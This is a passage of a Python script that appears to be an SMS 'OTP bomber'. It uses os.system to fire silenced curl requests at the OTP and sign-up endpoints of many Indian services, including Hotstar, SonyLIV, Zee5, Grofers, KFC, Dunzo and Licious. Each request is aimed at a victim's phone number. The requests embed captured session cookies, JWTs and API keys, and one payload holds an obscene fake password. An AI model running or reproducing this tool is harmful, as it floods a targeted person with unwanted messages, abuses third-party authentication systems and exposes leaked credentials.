stickyLyftBrowserId=ktYIIUcbQRMdDASa3mEtGdXp' -H 'TE: Trailers' --data-raw '{"phone_number":"+91'''+target+'''","extend_token_lifetime":false,"ui_variant":"RiderWebOnboardingV1"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://api.hotstar.com/um/v3/users/f37c1eeb647b4b329ad8d212550a51ed/register?register-by=phone_otp' -X PUT -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.hotstar.com/in' -H 'Content-Type: application/json' -H 'X-HS-Device-Id: 2623ddb9-8849-49d4-b6bd-1be6ab8f9a8a' -H 'X-Country-Code: IN' -H 'X-HS-Platform: PCTV' -H 'X-Request-Id: 2623ddb9-8849-49d4-b6bd-1be6ab8f9a8a' -H 'X-HS-AppVersion: 6.97.0' -H 'hotstarauth: st=1605941888~exp=1605947888~acl=/um/v3/*~hmac=45bf48ac9726a96ec616cc05d1871aec49f8d51b23f150f8322ee721143d51c3' -H 'X-HS-UserToken: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJ1bV9hY2Nlc3MiLCJleHAiOjE2MDY1NDY2MDAsImlhdCI6MTYwNTk0MTgwMCwiaXNzIjoiVFMiLCJzdWIiOiJ7XCJoSWRcIjpcImYzN2MxZWViNjQ3YjRiMzI5YWQ4ZDIxMjU1MGE1MWVkXCIsXCJwSWRcIjpcIjljZDQyZDEwYWZhNDQ0MzU4MzQwYTY5MWRmMjE2OWM1XCIsXCJuYW1lXCI6XCJHdWVzdCBVc2VyXCIsXCJpcFwiOlwiMTAzLjI0OS4yMzMuNzBcIixcImNvdW50cnlDb2RlXCI6XCJpblwiLFwiY3VzdG9tZXJUeXBlXCI6XCJudVwiLFwidHlwZVwiOlwiZ3Vlc3RcIixcImlzRW1haWxWZXJpZmllZFwiOmZhbHNlLFwiaXNQaG9uZVZlcmlmaWVkXCI6ZmFsc2UsXCJkZXZpY2VJZFwiOlwiMjYyM2RkYjktODg0OS00OWQ0LWI2YmQtMWJlNmFiOGY5YThhXCIsXCJwcm9maWxlXCI6XCJBRFVMVFwiLFwidmVyc2lvblwiOlwidjJcIixcInN1YnNjcmlwdGlvbnNcIjp7XCJpblwiOnt9fSxcImlzc3VlZEF0XCI6MTYwNTk0MTgwMDg1M30iLCJ2ZXJzaW9uIjoiMV8wIn0._2-mZ84PQX5ls_P-Nkorc-OBP0y7RaUVCBGmLggJp0s' -H 'Origin: https://www.hotstar.com' -H 'Connection: keep-alive' -H 'TE: Trailers' --data-raw '{"phone_number":"'''+target+'''","country_prefix":"91"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://us-central1-vootdev.cloudfunctions.net/usersV3/v3/checkUser' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.voot.com/' -H 'Content-Type: application/json;charset=utf-8' -H 'Origin: https://www.voot.com' -H 'Connection: keep-alive' -H 'TE: Trailers' --data-raw '{"type":"mobile","mobile":"'''+target+'''","countryCode":"+91"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://apiv2.sonyliv.com/AGL/1.6/A/ENG/WEB/IN/CREATEOTP' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/json' -H 'x-via-device: true' -H 'security_token: eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE2MDU5NDEwNDEsImV4cCI6MTYwNzIzNzA0MSwiYXVkIjoiKi5zb255bGl2LmNvbSIsImlzcyI6IlNvbnlMSVYiLCJzdWIiOiJzb21lQHNldGluZGlhLmNvbSJ9.Ec_TZkyW_oLPDxsV_98fqSVS8tMUpM2TqZDmUbou3e1Il-2GiES8SPaXbnPugb_Tk8sA8jCGXWz6HdrCClds2NGDbzZKbAQm_A4HmWC_lChX9EP1rEnhaFEUJpqQ6Lyq7hunIzYwkVhuxnn_kui779soOOj1gyp436o8wwx6lt3mvAWrCUD7N9cVdtkMkYZqj7FslMb-GyA9g5q9iQ1wS8NYET10x8V3LvMIRjOyqY4eB-p_d6V3MYseLNqzBmh-59_3k3z7jVs5W0TKRjmVa3UW8RZw-aexWCuYUW3vYiwP6LhN2pfr_qVYL23nvedW0bSleAbhaJ0zo3vVst9XX2za0uzMxc1K0BZPYL5sAKCdWwvDDbpjOvAn0q_6y6iSeqLCPK2qpylL1tq5az-fpvLVz_6nB-KJp8wf64tKgjSl-AT_hfD6CroLm33QmFsDrKPGnNOK8wVbXbAosi9rK_nJm2lNys8RtpNKW3TDEEdnKN614rDIyzsniJm0u-mULjhkwkyFXrMuQzXLghf08eYO68YqUGTzm4sb2rka8cObFWqiyNs9RpZ1Y49uB3bm4BIS_vnF6V4YSgwg5bZPvsyAWEVdZ09Xv3b87oYh0eKRYVPv9qWtGXe3Ph3YKSeaKBGt9q1476Hju2OdbNZTf0zY3VFoKCPVO9Y-2OZfvg4' -H 'app_version: 3.1.83' -H 'device_id: 7b86369547be4f3cbedad7b216375689-1605942443823' -H 'session_id: 99ec927de94146feac91062a8de05040-1605942443889' -H 'Origin: https://www.sonyliv.com' -H 'Connection: keep-alive' -H 'TE: Trailers' --data-raw '{"mobileNumber":"'''+target+'''","channelPartnerID":"MSMIND","country":"IN","timestamp":"2020-11-21T07:07:43.865Z","otpSize":6}' > /dev/null 2>&1
''')
os.system('''
curl 'https://b2bapi.zee5.com/device/sendotp_v1.php?phoneno=91'''+target+'''' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.zee5.com/verify-mobile-number' -H 'Origin: https://www.zee5.com' -H 'Connection: keep-alive' -H 'TE: Trailers' > /dev/null 2>&1
''')
os.system('''
curl 'https://in.bookmyshow.com/pwa/api/uapi/otp/send' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://in.bookmyshow.com/explore/home/goa' -H 'Content-Type: application/json' -H 'Origin: https://in.bookmyshow.com' -H 'Connection: keep-alive' -H 'Cookie: __cfduid=d4d85ebda6240e7ebfacde35464f1ad691605943730; bmsId=1.369259481.1605943730519; rgn=%7B%22regionNameSlug%22%3A%22goa%22%2C%22regionCodeSlug%22%3A%22goa%22%2C%22regionName%22%3A%22Goa%22%2C%22regionCode%22%3A%22GOA%22%2C%22subName%22%3A%22%22%2C%22subCode%22%3A%22%22%2C%22Lat%22%3A%2215.378%22%2C%22Long%22%3A%2274.019%22%7D; preferences=%7B%22ticketType%22%3A%22M-TICKET%22%7D; _gcl_au=1.1.1059617916.1605943794; __cfruid=7429a7cb4644726666245c0734b598a450e351f2-1605943748; WZRK_S_RK4-47R-98KZ=%7B%22p%22%3A1%2C%22s%22%3A1605943776%2C%22t%22%3A1605943830%7D; WZRK_G=4fcd821ef5f64d14995572463d8a0ba7; sessionId=1605943830395; AMP_TOKEN=%24NOT_FOUND; tvc_bmscookie=GA1.2.870453991.1605943833; tvc_bmscookie_gid=GA1.2.1045120677.1605943833; _fbp=fb.1.1605943834287.980745622; G_ENABLED_IDPS=google' -H 'TE: Trailers' --data-raw '{"channel":"phone","subChannel":"sms","details":{"phone":"'''+target+'''","origin":"https://in.bookmyshow.com"}}' > /dev/null 2>&1
''')
os.system('''
curl 'https://ap2-prod-direct.discoveryplus.in/authentication/sendOTP' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://auth.discoveryplus.in/login/otp?flow=OTPLogin' -H 'content-type: application/json' -H 'x-disco-client: WEB:x86_64:WEB_AUTH:1.0.56' -H 'X-disco-params: realm=dplusindia' -H 'Origin: https://auth.discoveryplus.in' -H 'Connection: keep-alive' -H 'Cookie: _fbp=fb.1.1605944649588.1741712393; AMCV_9AE0F0145936E3790A495CAA%40AdobeOrg=359503849%7CMCIDTS%7C18588%7CMCMID%7C50321376618791551040084359461297439908%7CMCAAMLH-1606549451%7C12%7CMCAAMB-1606549451%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1605951851s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C5.0.1; AMCVS_9AE0F0145936E3790A495CAA%40AdobeOrg=1; st=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJVU0VSSUQ6ZHBsdXNpbmRpYTpkZDA2MzAwNC1hMTNjLTQwZmQtOGQwNS1mZTlhOTJkYTYzNDIiLCJqdGkiOiJ0b2tlbi1jMTc0YTY0Yy03MThmLTQ0YTgtYTVhNS0yMWZhOWM2YTZjNmQiLCJhbm9ueW1vdXMiOnRydWUsImlhdCI6MTYwNTk0NDYwMn0.kRX3uXzy4rM_fue36mBVtW3FO--vwKXy3sevJNZo2DA; gpv_Page=auth%3Aaccount-login-otp; s_ppv=https%253A%2F%2Fauth.discoveryplus.in%2Flogin%2Fotp%253Fflow%253DOTPLogin%2C100%2C100%2C541%2C1%2C1; s_ips=541; s_tp=541; s_plt=2.35; s_pltp=undefined; s_nr30=1605944808863-New; s_cc=true; __gads=ID=99a8de6228209493:T=1605944608:S=ALNI_MY58UJLp3axcPLhxyjMzpWxYfJG-A; s_sq=discoverydpdiscoveryplusdev%3D%2526c.%2526a.%2526activitymap.%2526page%253Dhttps%25253A%25252F%25252Fauth.discoveryplus.in%25252Flogin%25253Fflow%25253DOTPLogin%2526link%253DResend%252520OTP%2526region%253Dcontest-wrapper%2526.activitymap%2526.a%2526.c%2526pid%253Dhttps%25253A%25252F%25252Fauth.discoveryplus.in%25252Flogin%25253Fflow%25253DOTPLogin%2526oid%253Dfunctionur%252528%252529%25257B%25257D%2526oidt%253D2%2526ot%253DDIV' -H 'TE: Trailers' --data-raw '{"destination":"91'''+target+'''","channel":"sms"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://udbreg.nimo.tv/sms/send/reg' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://udbreg.nimo.tv/web/middle/2.1/48432542/https' -H 'lcid: 1033' -H 'uri: 20009' -H 'reqid: 48546920' -H 'context: WB-d10d5dd3ce3d4dc4a6039ca2f767e952-C92520807E90000145901ACFF50057F0-0a47694e10c8b85fa2022b252c25d7d6' -H 'content-type: application/json;charset=UTF-8' -H 'Connection: keep-alive' -H 'Cookie: country=IN; lang=1033; ccountry=IN; clang=1081; __yamid_new=C92520807E90000145901ACFF50057F0; __yasmid=0.9028449856389107; _yasids=__rootsid%3DC92520808CA00001CA5F64F4178E10F9; _ga=GA1.2.1878377613.1605945412; _gid=GA1.2.1164645722.1605945412; theme=2; guid=0a47694e10c8b85fa2022b252c25d7d6; ya_popup_login_from=signup_bt; udb_guiddata=d10d5dd3ce3d4dc4a6039ca2f767e952' -H 'TE: Trailers' --data-raw '{"uri":"20009","version":"2.1","context":"WB-d10d5dd3ce3d4dc4a6039ca2f767e952-C92520807E90000145901ACFF50057F0-0a47694e10c8b85fa2022b252c25d7d6","appId":"1005","lcid":"1033","byPass":"2","requestId":"48546920","data":{"phone":"0091'''+target+'''"}}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.abhibus.com/sendOtp' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.abhibus.com/account/sign_in' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Cookie: AWSALB=HIOoqRpGJuV69+uwFFRHOIli2Joi2lwFqsLhMBYO/k80Fp34Lty6+oxKhIt8Rknm9y/oB4SDyZ6qEg+kT0lCMz5Avj7bE8JqQpHYCdRNW2oApA+fG2eXC8xdZnZG; AWSALBCORS=HIOoqRpGJuV69+uwFFRHOIli2Joi2lwFqsLhMBYO/k80Fp34Lty6+oxKhIt8Rknm9y/oB4SDyZ6qEg+kT0lCMz5Avj7bE8JqQpHYCdRNW2oApA+fG2eXC8xdZnZG; ci_session=Sby3XFGhcgNSPWSWHNbqqv6Be1O6%2FwPGW1RY9OXx6B4veATlgolAzAiYzO8narYQ%2FgAMIPMfmPPFzfxrntI%2BruaR1sfj46ofecUJ0twNneGa9rPt2EBfNeH0AjGbrBujCJGPfaXDFHNcqoxkhaTQ0MTbLKW6sZgBMtcsXJ7z0HUQx88yN3BWEbkC3X7XP02KOdWkSXys7dIh9M2b4KU07k9GNd8FK49Ow9E5qOPkZYlokQpek4WWMyzg6ZUGMo5iS%2Fbp8WPiN12aWxtzBkMGqYS5UFlGxxStg1gofAPti%2BErpv78K6QEjnKf%2FP09nKxdUfN%2F8E27PyIKhGqUNXtwVK6YUviN%2BIXpMUJnIN3gJtHubHxyZVFhboQLRXnZuOHt7I8JmE2LweSaUgrAPRvWjeM6NNuCPsVDmT7QZs75vGsAJ9DblmWzHPddo82Y0RPJd%2B0JZWvplXfvM%2F2wmTPv9k5vHjqJeGavfUZEhuJHTdforYCaoyMc4hAxO%2Bd5BmYV; AKA_A2=A; ak_bmsc=00D3D20BB023715D18A5EFC1B5BDF67B312C5F1FCE2C0000F8CDB85FF9C4100B~pluOADqSm7WhUoBJBNRn+spUzJpeITa6EDjBouSaNo/YBcmtS65TnSbB3N38c31BH3ThcCc7yMHKCSPWatBZGdsVOUHPxTTkXwuwXp/CxxJaTNyFcKES0jEPnAj6FHoiuQ33eBCGvqxhEFcFNNFLoIOeud8vhiRFXw59u9ZfDaIC6IIGmW1HkPpl+a/JB28uXtk/8sTzE0aaT144doSE4POB2S2slMV3HNg8l4trV2vuP/3gru+NQDDhNRVnn7SJke; __asc=a680cca7175e9e5773689dd9156; __auc=a680cca7175e9e5773689dd9156; WZRK_S_R95-8KW-K75Z=%7B%22p%22%3A1%2C%22s%22%3A1605946879%2C%22t%22%3A1605946932%7D; WZRK_G=925cce25e1f545539299fc0ee72c2bb8; _gcl_au=1.1.983957309.1605946932; _fbp=fb.1.1605946932796.2088702601; _ga=GA1.2.1042381544.1605946933; _gid=GA1.2.1781041860.1605946933; _gat_gtag_UA_6315501_1=1; _gat_UA-6315501-1=1; 
__gads=ID=b7b906592c2abfcb-2292f69cd9c4005f:T=1605946880:RT=1605946880:S=ALNI_Mam7VFc-3axU37meaLiBA5NSmz1UA; PHPSESSID=k3m16r4m5756lu73d80efttp22; bm_sv=7D7A9F918E245F6D4D5716B839C79AC6~mdYaMg/oC9h2IhbwLgim23YbbkmkuzsuG/sGoGB27IxDE0Kn4c7ezZ7+tgs48nEvjgIx9mM69m/Gz0Asf+1tWbXhm3CTgd9t2PST31hcDlVaCkRrnwDBaQsJMl5xH6wWloD5OI8OliuPcKAwX5smzn18nGqP/EvpuBR5BhpKzzE=; G_ENABLED_IDPS=google' -H 'TE: Trailers' --data-raw 'mobile='''+target+'''&referralCode=' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.urbanclap.com/api/v2/growth/profile/generateOTP' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'X-device-os: desktop_web' -H 'X-device-id: ucu451db-994b3d23f1-a756-af62-9ed1-688f1e8063-1605947448812' -H 'X-version-name: web_v4.160.0' -H 'X-version-code: 4.160.0' -H 'X-client-key: f4113c23a68c9cb3bf695c4490f9f3da9abc8674712f5b870906ec26bab7602aed85ad71640e8d9f785ea09db5a298a950b335adc5b8cbb6ce58209e2912eac6' -H 'Cache-Control: no-cache' -H 'Content-Type: application/json;charset=utf-8' -H 'Origin: https://www.urbancompany.com' -H 'Connection: keep-alive' -H 'TE: Trailers' --data-raw '{"country_id":"IND","phone":{"isd_code":"+91","phone_wo_isd":"'''+target+'''"},"device_type":"customer"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://grofers.com/v2/accounts/' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://grofers.com/' -H 'Content-Type: application/x-www-form-urlencoded' -H 'auth_key: 7f4a2aeda55434ff9218591e1379c3fc24260df4df8088ffdcc54f592d9103b1' -H 'app_client: consumer_web' -H 'device_id: 3ab76446-3a11-4ea6-a0a7-8fc2ae71bcf0' -H 'Lat: 28.4465616' -H 'Lon: 77.040489' -H 'Origin: https://grofers.com' -H 'Connection: keep-alive' -H 'Cookie: __cfduid=da9108fd4a73e7349392734637db5e4411605948005; gr_1_deviceId=3ab76446-3a11-4ea6-a0a7-8fc2ae71bcf0; city=Ahmedabad; __cfruid=a9307b78d3993519256a5fe2ed837a13127f3559-1605948006; _gcl_au=1.1.217980137.1605948061; gr_1_lat=23.1090643329249; gr_1_lon=72.5715186777276; gr_1_locality=959; ajs_anonymous_id=%2290d1883e-67db-4d3e-998c-3f463e41c33f%22; _sp_ses.bf41=*; _sp_id.bf41=82322e787b13febf.1605948065.1.1605948065.1605948065.3d722cce-daaa-4035-b1fd-3f6559dd27f0; _ga=GA1.2.697558095.1605948065; _gid=GA1.2.1044998150.1605948065; _gat_UA-85989319-1=1; WZRK_S_RKR-99Z-ZK5Z=%7B%22p%22%3A1%2C%22s%22%3A1605948016%2C%22t%22%3A1605948079%7D; rl_anonymous_id=%22d71d5897-9c78-4a70-8373-6fd524ca4ada%22; rl_user_id=%22%22; WZRK_G=a0c7984d8c284b7da12d112cb4c4bbdf; _uetsid=4ced05102bd511ebb2a28d556b8900ac; _uetvid=4cedabd02bd511eb97922ffe7a17227c; _hjid=af04b224-baca-4475-a9ad-62935e6c6e9e; _hjFirstSeen=1; __insp_wid=180455199; __insp_slim=1605948070605; __insp_nv=true; __insp_targlpu=aHR0cHM6Ly9ncm9mZXJzLmNvbS8%3D; __insp_targlpt=T25saW5lIEdyb2NlcnkgU3RvcmU6IEJ1eSBPbmxpbmUgR3JvY2VyeSBmcm9tIEluZGlhJ3MgQmVzdCBPbmxpbmUgU3VwZXJtYXJrZXQgYXQgRGlzY291bnRlZCBSYXRlcyB8IEdyb2ZlcnM%3D; _fbp=fb.1.1605948070960.726802374; _hjAbsoluteSessionInProgress=0; __insp_norec_sess=true' -H 'TE: Trailers' --data-raw 'user_phone='''+target+'''' > /dev/null 2>&1
''')
os.system('''
curl 'https://api.starquik.com/v3/users/register' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.starquik.com/' -H 'device: desktop' -H 'storeid: 1' -H 'version: 1.0' -H 'temptoken: b21ab397b8fae3d4e6cb44a0b0c516ea8f86d13e' -H 'Content-Type: text/plain' -H 'Origin: https://www.starquik.com' -H 'Connection: keep-alive' -H 'TE: Trailers' --data-raw '{"uemail":"kuchbhi@gmail.com","number":"'''+target+'''","password":"Teri@makichut1234","fname":"rider","devicetoken":"dsdb2sbd732hgsdv","quote_id":""}' > /dev/null 2>&1
''')
os.system('''
curl 'https://online.kfc.co.in/OTP/ResendOTPToPhoneForLogin?ts=1605948543950' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://online.kfc.co.in/login' -H 'Content-Type: application/json;charset=utf-8' -H '__RequestVerificationToken: 1Jth_chy15gB7zsGswSMmQJrZCyXXdQ7BrzvdL4zD_sfeD49Hfo48Scbjftv1q0uCjg5d9miweyZ-ZVwmp7HN9Ct3TRd4Dixv8ekAIB0apU1:IltF22zAce93VpQPp9lP9aznLuORmk3NYfnMb4xMKPP9XmtHy-0UUSS4SicIezbGiKjj_IhTp2QFo4u6iwZCq8Vo_SdSYvzhOghFdxbxSSU1' -H 'Connection: keep-alive' -H 'Cookie: AWSALB=xf3DIycxIycEG57RWNTKfJ89bLoJKoTJqjZODCh1CRvwp5jDYWzYZ1LRPFf6ESOl3zFIhZT+GoihhhRV/b6x2RHBAkxOFeAL1kYyClz+v5SVRlWA7JpTjlkvYVwA; AWSALBCORS=xf3DIycxIycEG57RWNTKfJ89bLoJKoTJqjZODCh1CRvwp5jDYWzYZ1LRPFf6ESOl3zFIhZT+GoihhhRV/b6x2RHBAkxOFeAL1kYyClz+v5SVRlWA7JpTjlkvYVwA; KFCI.A.SID=3ep3bk0mgtgvwfe23lgwre5w; KFCI.OM=None; KFCI.ASD=False; KFCI.IPO=False; KFCI.CHNL=All; KFCI.ReMe=False; KFCI.LC=en-US; KFCI.IMS=False; ak_bmsc=601D6DFD97A7A7C23C23D27C79EA2395B856F837C87D000034D4B85F272FF338~plSZSF7W+5QNdRdGKpmkPoCFR/qIkwZu9ZDAXkPCblNnuHoCGV1hhHZuqil+FvnKWrTEWkhuMCBWxVuyqpvRuxvev+1S4UrTSGkia9N1OOQMHRZIDf0B2DiBXag4MnZsF8XHTCYFrjdDbZwLVaJHl+LLcGZX8qvtG6dAN27L7iUDv3oeAuMBn1oyILdXtSpr9MEeh8/pxTdbFwUC8/5ZTCOa/PZlo94qNG/Y17z7hvbLwFpLBlXbAsfJRgPpu6wbTU; _gcl_au=1.1.1360240744.1605948523; _uetsid=5c1c9ee02bd611ebbefc8140f7b21fa4; _uetvid=5c1d2fa02bd611eba86359d80e07782e; _ga=GA1.3.2027297284.1605948523; _gid=GA1.3.247181489.1605948523; _gat_UA-39424837-1=1; bm_sv=E087B4A6FBEFD32352D2FEAFE60FE4A1~KZEi10oJuKAg7quCwDActlsnFSqqSxYjddn0sPjHrouUd7BCyexVxvOHH7b/bLzN++SgZW+o2w1gQWquFoGOU2GJg4IQaFraoHYtuQKiThFSZ0iI7i7nlWjCwDBocQp4fOT21KnARdFugaedLrcabE/qhLcIhGCHNVkCpJsEtPg=; 
bm_mi=38E5F96C27513D686854F79819BBDAE6~IOopVe3NvvSt3CGOvHQmpWAVvz3RtNaKcL7jfKDHMJwC8pw2CA5z6AlHF2M+LieFzag/zLaV7jnE1yzmpBYxmVs400+pcWKd+VrfOmPT5RJGbkMh7SsY9n8wXfB7dFp6SmTinE3HdmVsecEnusiYlF9FPyl4YWXpSJGdxqyX+qY0kNxQCYAjin2IekFXaZWbGNEqM8w/nYqD5x8Bwumcm+wTgPdi+7Q/4nEfppwtCyt73gvqo2ykmIz2LwVtWkVoIoQnR9+CDj3cZCMAViA7lRhpEuNvuqNRsOomwxtc3qk=; _fbp=fb.2.1605948524686.1722815359' -H 'TE: Trailers' --data-raw '{"phoneNumber":"'''+target+'''","AuthorizedFor":"3","Resend":"false"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.dunzo.com/api/v0/auth/sign-up' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.dunzo.com/mumbai' -H 'X-APP-TYPE: PWA_WEB' -H 'X-APP-VERSION: 2.0.0' -H 'Content-Type: application/json;charset=utf-8' -H 'x-csrf-token: amsZF9Iz-nQrMrSUlGOHhQFjm_oV4DhY2wlc' -H 'Connection: keep-alive' -H 'Cookie: dz_e=ZjAwNmE1YmMtYThjNC00NzFiLThhOTItNTExMjA4NTIzN2UzX3Yx; connect.sid=s%3A3ywZEa3mEhYx4KdNOrxqbPwkht-H7R8O.%2Bctmbheg057DICTL%2Bcx5EYM3CkzlCnzXa3Zsg1L%2B35I; WZRK_S_46R-KR9-WZ5Z=%7B%22p%22%3A1%2C%22s%22%3A1605948593%2C%22t%22%3A1605948646%7D; lux_uid=160594864203567282; WZRK_G=0e0a9f8578a54f0188709b3d692ca079; _gcl_au=1.1.1322093315.1605948646; _ga_MH9JSX933B=GS1.1.1605948645.1.0.1605948645.0; _ga=GA1.2.1981897832.1605948647; _gid=GA1.2.1590119548.1605948647; _gat_UA-74154936-4=1; _fbp=fb.1.1605948646953.916332621' -H 'TE: Trailers' --data-raw '{"phone":"'''+target+'''"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.mykirana.com/index.php?route=feed/api/v2/account/sendOtp&key=98f13708210194c475687be6106a3b99' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.mykirana.com/index.php?route=product/seller_list' -H 'X-NewRelic-ID: Vg4HUFFRDBAFUlhWBwcFV1A=' -H 'newrelic: eyJ2IjpbMCwxXSwiZCI6eyJ0eSI6IkJyb3dzZXIiLCJhYyI6IjI4MDE3MjQiLCJhcCI6IjU2OTQ1MDcxNCIsImlkIjoiMTgyZThhOWMxYzI2MWUzNiIsInRyIjoiZTRlMjA3YzA0NmE1ZWRiZWQ2NzNkMzcwYjg4ZDg4NjAiLCJ0aSI6MTYwNTk0OTA0ODIyMn19' -H 'traceparent: 00-e4e207c046a5edbed673d370b88d8860-182e8a9c1c261e36-01' -H 'tracestate: 2801724@nr=0-1-2801724-569450714-182e8a9c1c261e36----1605949048222' -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Cookie: KARTROCKETSESS=v2g913iu3hv3f7mo4k9hievqr0; device=W; language=en; customer_logged=0; country=NA; currency=INR; AMCV_36A37AC159F1E4EE0A495C6A%40AdobeOrg=-715282455%7CMCIDTS%7C18588%7CMCMID%7C50283778257614435430087371647250465747%7CMCAAMLH-1606553772%7C12%7CMCAAMB-1606553772%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1605956172s%7CNONE%7CvVersion%7C4.2.0; _ga=GA1.2.1261557396.1605948970; _gat_u0=1; _gat_u1=1; cus_device=102503ec62c47fd8bcf197e7d1388137; AMCVS_36A37AC159F1E4EE0A495C6A%40AdobeOrg=1; s_getNewRepeat=1605949048236-New; s_ppn=%7C%7Cbrand%20site%7C%7C%7C%7Cseller%20list; s_ppvl=%257C%257Cbrand%2520site%257C%257C%257C%257Cseller%2520list%2C32%2C32%2C541%2C1366%2C541%2C1366%2C673%2C1%2CP; s_ppv=%257C%257Cbrand%2520site%257C%257C%257C%257Cseller%2520list%2C35%2C32%2C541%2C772%2C541%2C1366%2C673%2C1%2CP; s_ptc=0.00%5E%5E0.00%5E%5E0.00%5E%5E0.00%5E%5E0.64%5E%5E0.03%5E%5E7.99%5E%5E0.12%5E%5E8.82; s_cc=true; aam_uuid=49800726440750807020135898942490834682; area=Town+Hall+%28Mumbai%29; pincode=400001; s_sq=%5B%5BB%5D%5D' 
--data-raw '{"otp_type":"login","mobile":'''+target+'''}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.licious.in/onboarding/check-user' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.licious.in/' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-CSRF-TOKEN: g850kc3OanDf0JgwV88Hlb5AZUIDUmfTHUNoVt6M' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Cookie: XSRF-TOKEN=eyJpdiI6ImJ1N1hTRkNETzI1M0ZpUTdkM1pIckE9PSIsInZhbHVlIjoiWVBYbmlCd1plbUJyeDhpK2RFcFROWVwvZjR3cWNkMFBhNmhyc1ErMks4ZE5BVlFCY0F3Q1E0N1RjZE1oSVVoOWJJY3YxUUp3bDlvYlZ1UmxnRm9hK3JRPT0iLCJtYWMiOiI0NDAxODY0OTYxNmFlOWI5YzM3MDFlZTcyMzJkOGI5YmRkYmEyM2Q0MDJhYTQ4ODgyNTViZDEzMzY1YmQyYzE4In0%3D; licious_session=eyJpdiI6Im5LbnIzSG15QjB1QVhJdGxLbUdEWmc9PSIsInZhbHVlIjoicnZwSWk5NThzeHJieUZ4UjUwSWVEZHhnS1RSbGVWM1dIaFlRUEZoenZBWjJHTkwwWEZXVnlCcDdoTHU4aXZWRkFSK2VFUEd2R29rdHE4dTdSQVFGTGc9PSIsIm1hYyI6IjUzYjRkZGYxNzQ2MWUxNmM4OWIxMzVlOGJhNjU5MDQzZWUyNTc1NmZiODVkMmUwNzc3MTQyOGNjYzc5NTA1OTQifQ%3D%3D; WZRK_S_445-488-5W5Z=%7B%22p%22%3A1%2C%22s%22%3A1605949666%2C%22t%22%3A1605949720%7D; WZRK_G=e3fd8bc1334443dba842659c6d34f2c3; 